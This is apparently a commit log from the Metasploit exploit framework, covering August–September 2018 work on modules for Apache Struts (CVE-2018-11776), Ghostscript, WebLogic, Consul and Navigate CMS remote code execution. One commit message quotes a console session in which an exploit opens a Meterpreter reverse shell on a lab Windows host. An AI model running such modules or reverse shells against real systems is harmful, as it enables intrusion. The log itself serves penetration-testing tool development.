2b86297138
Refactor
2018-09-27 11:16:54 +02:00
f55483d17d
Fix incorrect session_id extraction
2018-09-27 11:07:43 +02:00
f882c3aec2
Add Navigate CMS Unauthenticated Remote Code Execution
2018-09-26 21:39:15 +02:00
fd8ad6f4d8
struts2_namespace_ognl: Added verbose messages for errors with Tomcat >= 7.0.88
2018-09-18 15:26:28 -05:00
4933f47ac5
struts2_namespace_ognl: Remove debugging code
2018-09-18 14:46:41 -05:00
a9e6257891
struts2_namespace_ognl multishot OGNL payloads for Windows Meterpreter support
2018-09-18 14:27:47 -05:00
6126a627cc
Land #10570 , AKA Metadata Refactor
2018-09-17 22:29:20 -05:00
011c25ed59
Merge changes from master (ghostscript)
2018-09-17 13:57:28 -05:00
4c036e70c1
Fix http://seclists.org links to https://
...
I have no idea how this happened in my own code. I was seeing https://.
2018-09-15 18:54:45 -05:00
718aaca0f4
Land #10546 , Add Apache Struts exploit: CVE-2018-11776
2018-09-07 14:54:23 -05:00
bd50e00ccc
Make some small changes:
...
Changes made:
* DisclosureDate
* Privileged to false
* Remove gsub for ';'
* Set cmd/unix/generic as the default payload for ARCH_CMD (linux)
2018-09-07 14:48:33 -05:00
b3cd4a89ad
Move CVE ref to top as per ~standard~
2018-09-07 14:33:25 -05:00
68ca771764
Add CVE reference to ghostscript_failed_restore.rb
2018-09-07 14:24:15 -05:00
99ca6cef49
Quote-block cleanup and improved error handling
2018-09-07 11:43:04 -05:00
3671f8f6b0
Handling for Tomcat namespace issues, 'allowStaticMethodAccess' settings, and payload output
...
Depending on the configuration of the Tomcat server, `allowStaticMethodAccess` may already be set. We now try to detect this as part of `profile_target`. But that check might fail. If so, we'll try our best and let the user control whether we prepend OGNL to enable `allowStaticMethodAccess` via the 'ENABLE_OGNL' option.
Additionally, sometimes enabling `allowStaticMethodAccess` will cause the OGNL query to fail.
Additionally additionally, some Tomcat configurations won't provide output from the payload. We'll detect that the payload ran successfully, but tell the user there was no output.
2018-09-06 17:56:42 -05:00
7eb06b4592
Address travis errors: Updated metadata and target OS logic
2018-09-06 12:43:56 -05:00
cb16f812ec
struts2_namespace_ognl updates from code review
...
Thanks to @wvu, @firefart, and @wchen!
2018-09-06 11:50:57 -05:00
243267b2f5
Add Linux dropper target
2018-09-05 19:57:12 -05:00
61044e8bca
Refactor targets to align with current style
2018-09-05 19:56:32 -05:00
692ddc8b8b
Eschew updating imagemagick_delegate
...
The hype is over, and the target was provided as a bonus. Now update the
module language to reflect that.
2018-09-05 19:56:32 -05:00
1491f13bd5
Add Ghostscript failed restore exploit
2018-09-05 19:56:32 -05:00
eb17d9b198
Refactor AKA references for modules
2018-08-31 16:56:05 -05:00
8fe8bf62e3
Renamed to match existing struts2_content_type_ognl and improved comments
2018-08-31 13:48:22 -05:00
35022d8332
Added payload upload+execution and OGNL-specific URI encoding
2018-08-31 13:39:42 -05:00
7c7f63df45
Fix missing normalize_uri in struts2_rest_xstream
...
I missed this one previously. May not be necessary but nice to have.
2018-08-30 15:56:43 -05:00
9d3e1c1942
Land #10540 , weblogic_deserialize, add check method and linux target
2018-08-30 06:08:03 -05:00
3161beff69
Prefer opt hash
2018-08-29 14:56:31 -05:00
bc4442694e
Fix Windows target options, remove comspec
2018-08-29 14:23:00 -05:00
b373dcc5d4
First draft of module and documentation for struts_namespace_rce against CVE-2018-11776
2018-08-28 16:53:26 -05:00
f6b868bac2
Prefer regex for target check in exploit method
...
This is how I initially wrote it out, and I think I like it better.
Obviously we'll still check individual symbols in execute_command, since
some of the matching is disjoint.
2018-08-28 15:56:45 -05:00
3dec79da23
Add Windows ARCH_CMD target and refactor again
...
Must have been an oversight that I didn't add the target.
2018-08-28 15:03:41 -05:00
94e8cdac37
Move files to correct location
2018-08-28 12:38:54 -05:00
7d21c2094e
Improve PSH target and refactor check code
2018-08-27 20:18:35 -05:00
df5f4caaae
Uncomment PSH target in struts2_rest_xstream
...
I'm full of shit. It works.
msf5 exploit(multi/http/struts2_rest_xstream) > run
[*] Started reverse TCP handler on 192.168.56.1:4444
[*] Powershell command length: 2467
[*] Sending stage (206403 bytes) to 192.168.56.101
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.101:49691) at 2018-08-27 20:00:47 -0500
meterpreter > getuid
Server username: MSEDGEWIN10\IEUser
meterpreter > sysinfo
Computer : MSEDGEWIN10
OS : Windows 10 (Build 17134).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 3
Meterpreter : x64/windows
meterpreter >
2018-08-27 20:01:00 -05:00
47ca6c6a14
Land #10527 , Fix msftdiy EDB link check, enable HTTPS
2018-08-27 10:49:20 -05:00
79b3e4564a
Land #10487 , add php5 session file target
2018-08-27 06:22:28 -05:00
9725e90ba7
Fix msftdiy EDB link check
2018-08-26 04:18:38 +00:00
6df235062b
Land #10505 , post-auth and default creds info
2018-08-24 18:08:15 -05:00
7f3824b067
Additional path for Linux target
2018-08-24 07:18:24 -05:00
3d0d8f7773
Update false negatives on post auth information
2018-08-20 15:43:07 -05:00
b9809d9435
Added support for php5 as target
...
location of the session file in php5 is /var/lib/php5/sess_file
2018-08-20 03:47:04 +05:30
60c0272270
Make style consistent
2018-08-15 21:27:40 -05:00
cd01f11fd2
Remove verifying host keys for all exploits
2018-08-15 14:54:41 -07:00
32bbc1c3a7
Fix fail_with.
2018-08-11 13:10:46 +02:00
647bcfb596
Add disclosure date.
2018-08-11 13:10:09 +02:00
44025a6b68
Missing disclosure date.
2018-08-11 13:08:18 +02:00
75f127d6e0
Add email addresses.
2018-08-11 12:41:04 +02:00
de59e1a07e
Add email addresses.
2018-08-11 12:39:59 +02:00
559983de32
Hashicorp Consul RCE via Services API.
2018-08-10 22:45:42 +02:00
dce03a74c1
Credit where it is due :)
2018-08-10 22:35:54 +02:00
Pyriphlegethon